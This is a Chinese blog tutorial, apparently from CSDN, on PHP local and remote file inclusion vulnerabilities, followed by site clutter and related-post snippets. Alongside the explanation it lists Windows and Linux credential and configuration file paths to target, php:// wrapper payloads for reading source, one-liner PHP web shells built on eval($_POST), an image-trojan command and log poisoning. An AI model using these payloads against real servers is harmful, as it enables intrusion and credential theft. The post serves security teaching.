文件包含漏洞

最新推荐文章于 2023-08-31 21:01:41 发布
最新推荐文章于 2023-08-31 21:01:41 发布
阅读量158 收藏
点赞数
分类专栏: 计算机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niqiu320/article/details/115212936
版权

什么是文件包含?

开发者在开发PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当做PHP来执行,这会为开发者节省大量的时间。
文件包含漏洞如何产生的?
文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。
php.ini设置中allow_url_include=on/off开关
开启意味可能存在远程包含(源程序代码可能存在过滤等情况),关闭意味不存在远程包含。
大多数web语言都可以使用文件包含操作,其中PHP语言所提供的文件包含功能太强大,太灵活,所以包含漏洞经常出现在PHP语言中。
漏洞分类:
根据包含的位置不同分为:
本地包含(LFI):包含本地的文件,当作脚本代码执行。
远程包含(RFI):包含远程上的一些文件,当作脚本代码去执行。
PHP包含函数:
在PHP中主要有以下几个包含函数:
include
include_once
require
require_once
包含函数介绍:
Include():
当使用该函数包含文件时,只有代码执行include()函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。
include_once():
功能和include()相同,区别在于当重复调用同一文件时,程序只调用一次。
require():
require()与Include()的区别在于require()执行如果发生错误,函数会输出错误信息,并终止脚本的运行。
使用require()函数包含文件时,只要程序以执行,立即调用文件,而include()只有程序执行到该函数时才调用。
require_once():
它的功能与require()相同,区别在于当重复调用同一文件时,程序只调用一次。
漏洞危害:
文件包含漏洞是一种危害比较大的漏洞,尤其是远程文件包含,其最大的危害就是能直接获取WebShell,如果站点存在文件包含漏洞,那么一切的防御措施就会变的毫无意义!
既然能够包含,也就意味着把文件拿来使用。
漏洞利用原理
在这里插入图片描述
PHP的配置选项allow_url_include为ON的话,则include/require函数可以加载远程文件,这种漏洞被称为"远程文件包含漏洞(Remote File Inclusion RFI)"。

allow_url_fopen = On 是否允许打开远程文件
allow_url_include = On 是否允许include/require远程文件

注意:如果是包含远程服务器上的PHP文件,那么得到的是被远程服务器解析过的PHP,所以在写一句话木马的时候就不要做成.php的文件,一般包含.txt的文件

漏洞靶场实战

Windows敏感文件:
c:\boot.ini 查看系统版本
c:\windows\system32\inetsrv\MetaBase.xml IIS配置文件
c:\windows\repair\sam 存储Windows系统初次安装的密码
c:\ProgramFiles\mysql\my.ini Mysql配置
c:\ProgramFiles\mysql\data\mysql\user.MYD MySQL root密码
c:\windows\php.ini php配置信息
Linux敏感文件:
/etc/passwd 账户信息
/etc/shadow 账户密码文件
/user/local/app/apache2/conf/httpd.conf Apache2默认配置文件
/user/local/app/apache2/conf/extra/httpd-vhost.conf 虚拟网站配置
/user/local/app/php5/lib/php.ini PHP相关配置
/etc/httpd/conf/httod.conf Apache配置文件
/etc/my.conf mysql配置文件
利用PHP封装协议读取文件或源码:
file://C:\Windows\win.ini
php://filter/read=convert.base64-enconde/resource=index.php
还可以使用PHP伪协议去造成代码执行:
php://input、zip://、data://等伪协议去执行代码
写入一句话:
将下列代码写入图片:

<?php fputs(fopen('shell.php','w'),'<?php @eval(\$_POST['x']);?>')>
<?php file_put_contents('1111.php',<?php @eval($_POST['x']);?>');?>

此代码会创建一个shell.php,我们只需要将这个图片包含进去即可。
图片马制作:
写入版权或备注信息
使用copy 1.jpg/b+help.php/a shell.jpg
其他思路
试想下:假设一个站点存在文件包含漏洞,但是没有上传点,我们想要获取该站点的Webshell时该怎么办?
利用日志文件码,将一句话记录到日志,利用包含漏洞将日志包含。
常见的日志:http://blog.csdn.net/qq_36119192/article/details/102956230
漏洞修复建议
白名单过滤
将需要包含的文件写死
黑名单过滤
.(点)/(反斜杠)(反斜杠)

香芋320
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
08_理论8_文件包含漏洞的原理与实践_20180921
02-10
### 文件包含漏洞的原理与实践 #### 一、文件包含漏洞概述 文件包含漏洞是一种常见的Web应用程序安全漏洞,尤其在使用PHP语言开发的应用程序较为普遍。这种漏洞允许攻击者通过控制程序用于指定要包含文件的...
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
文件包含漏洞全面详解
热门推荐
m0_46467017的博客
08-17 6万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
文件包含漏洞实战
yuan_boss的博客
08-31 1329
可以看到,我们成功获取到了hosts文件,但是这并不能证明是文件包含漏洞,因为这仅仅是把hosts文件读取出来了,最多能确定的是文件读取漏洞,所以我们可以写一个把phpinfo.php放到www的一个目录,我们尝试访问phpinfo.php,看看能否解析成功,解析成功了就说明是文件包含漏洞。我们仅仅可以使用文件包含漏洞,这个时候就需要考虑到php的一些封装协议了,利用封装协议,可以读取PHP文件源码,可以执行PHP命令。由上面的结果可知,我们利用php://input成功执行了php的命令。
文件包含漏洞详解
剁椒鱼头没剁椒的博客
12-01 4185
文件包含漏洞就是使用函数去包含任意文件的时候,当包含的文件来源过滤不严谨的时候,当存在包含恶意文件后,就可以通过这个恶意的文件来达到相应的目的。file : // #访问本地文件系统 http : // #访问HTTPs网址 ftp : // #访问ftp URL php : // #访问输入输出流 zlib : // #压缩流 data : // #数据 ssh2 : // #security shell2 expect : // #处理交互式的流 glob : // #查找匹配的文件路径。
文件包含漏洞-02】文件包含漏洞原理、简单测试实例以及空字符绕过实例
m0_64378913的博客
06-15 3028
概述:文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。定义:随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的
通达OA v11.8 getway.php 远程文件包含漏洞.md
最新发布
09-07
通达OA漏洞合集
Web应用安全:文件包含漏洞简介.pptx
06-18
文件包含漏洞是Web应用安全领域的一个重要话题,它主要源于开发者在编程时为了代码复用而采用的文件包含机制。这种机制允许程序动态地加载和执行存储在不同文件的代码,但同时也为攻击者提供了可乘之机。下面将...
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
未授权访问漏洞
niqiu320的博客
04-24 4532
web端未授权访问 未授权访问:未授权访问漏洞可以理解为需要安全配置或权限认证的地址,授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 B/S架构 一般存在后台界面,访问特定目录下的敏感文件,能直接跳过管理员登录,去访问后台管理内容。 C/S架构 一般存在默认安装的一些客户端应用程序,安装人员因缺少安全意识导致攻击者利用。 web端未授权挖掘实例 查找技巧 1、在访问后台时会在一瞬间加载出后台界面, 这时可以尝试挖掘。 2、在后台地址url后面输入
DC 靶机
niqiu320的博客
05-12 3941
DC-1实战 大致流程(copy博客为lainwith的) 环境kali 1、首先ifconfig 得知ip为192.168.149.xxx/ 2、局域网探测arp-scan -l 得知靶机ip为192.168.149.147 3、扫描端口nmap -sV -p- 192.168.149.147,查看端口信息,得知80端口开放,浏览器访问80端口查看 4、目录遍历dirb http://192.168.149.147,无可用信息 5.、启动Metersploit来查看漏洞并利用漏洞msfconsole 6
html静态页面
niqiu320的博客
05-06 3861
0x00 什么是网页? 网页是网站的-“页”,通常是HTML格式的文件,它通过浏览器来阅读。 网页是构成网站的基本元素,它通常由图片、链接、文字、声音、视频等元素组成。通常我们看到的网页,常见以 .htm 或 .hmtl 后缀结尾的文件,因此将其俗称为HTML文件。 什么是HTML? HTML指的是超文本标记语言,它是用来描述网页的一种语言。 HTML不是一种编程语言,而是一种标记语言。 标记语言是一套标记标签。 所谓超文本,有2层含义: 1、它可以加入图片、声音、动画、多媒体等内容(超越了文本
解析漏洞
niqiu320的博客
04-23 3845
IIS解析漏洞 什么是解析漏洞? 解析漏洞主要是一些特殊文件被Apache、IIS、Nginx等Web容器在某种情况下解释成脚本文件格式并得以执行而产生的漏洞。 解析漏洞分类: IIS解析漏洞 Nginx解析漏洞 Apache解析漏洞 IIS解析漏洞: 1、目录解析: 以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。 2、文件解析 .asp;.jpg像这种畸形文件名在“;”后面的直接被忽略,也就是说当成.asp ...
python小测试
niqiu320的博客
05-14 3580
姓名: 作答时间: 1:请说明解释型语言和编译型语言之间的区别 2:面向过程编程/函数式编程/面向对象编程三者之间的异同点 3:请写出Python的选择结构与循环结构,注意语法格式 4:请简单描述8基本的排序算法,并说明其优缺点。 插入排序/希尔排序/选择排序/冒泡排序/快速排序/堆排序/归并排序/基数排序 5:针对文件操作的方法,请写出6,并写出C类1-255IP地址(参照PHP操作方法) r  只读,默认模式 w  只写,不可读,若文件不存在则创建,若存在,则删除内容,写入新内容 a
文件上传漏洞asp、php、jsp、aspx如何绕过黑名单
niqiu320的博客
04-27 3298
文件上传漏洞asp、php、jsp、aspx如何绕过黑名单 脚本语言 绕过方式 asp .php/.php5/.php4/.php3/.php2/php1/.html/.htm/.phtml/.pHp/.pHp5/.pHp4/.pHp3/.pHp2/.pHp1/.Html/.Htm/.pHtml php .jsp/.jspa/.jspx/.jsw/.jsv/.jspf/.jtml/.jSp/.jSpx/.jSpa/.jSw/.jSv/.jSpf/.jHtml jsp .asp/.as
暴力破解
niqiu320的博客
04-22 3080
暴力破解简介 暴力破解或称为穷举法,是一种针对账号、密码的破译方法,即将账户、密码进行逐个推算直到找出真正的密码为止。 暴力破解攻击是指攻击者通过系统地组合所有可能性(例如登录时用到的账户名、密码),尝试所有的可能性破解用户的账户名、密码等敏感信息。攻击者会经常使用自动化脚本组合出正确的用户名和密码。 暴力破解的危害 恶意用户登录 服务器沦陷 敏感信息泄露 用户密码被重置 敏感目录、参数被枚举 用户订单被枚举 。。。。。。 暴力破解的分类 从不同的架构来讲主要分为两种 - 基于B/S架构的暴力破解 登录框(
linux定时计划反弹shell
niqiu320的博客
05-26 2274
crontab crontab命令常见于Unix和Linux的操作系统之,用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于“crontab”文件,以供之后读取和执行。通常,crontab储存的指令被守护进程激活。crond 常常在后台运行,每一分钟检查是否有预定的作业需要执行。这类作业一般称为cron jobs。 安装(默认自带crontab) yum -y install vixie-cron yum -y install crontabs 说明: vixie-cron 软件包
MSF和永恒之蓝&渗透安卓手机
niqiu320的博客
04-23 2217
Metasploit简介 Metasploit框架是一个开源的渗透工具,它是由Ruby语言编写的模块化框架,具有良好的扩展性,通过它可以轻易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 它提供了多个基本的用户接口,包括终端、命令行、图形化等,一般我们使用较多的是终端MSF和图形化的Armitage 它分为社区版和商业版 qpt-get update apt-get install metasploit-framework MSF框架是由多个模块组成的,具体的模块
PHP文件包含漏洞深度解析
文件包含漏洞的原理及特点:当应用程序允许用户控制包含文件的路径时,就可能出现文件包含漏洞。攻击者可以通过构造特定的输入,使得程序包含攻击者指定的文件,这可能是服务器上的任意文件,甚至远程服务器上的文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值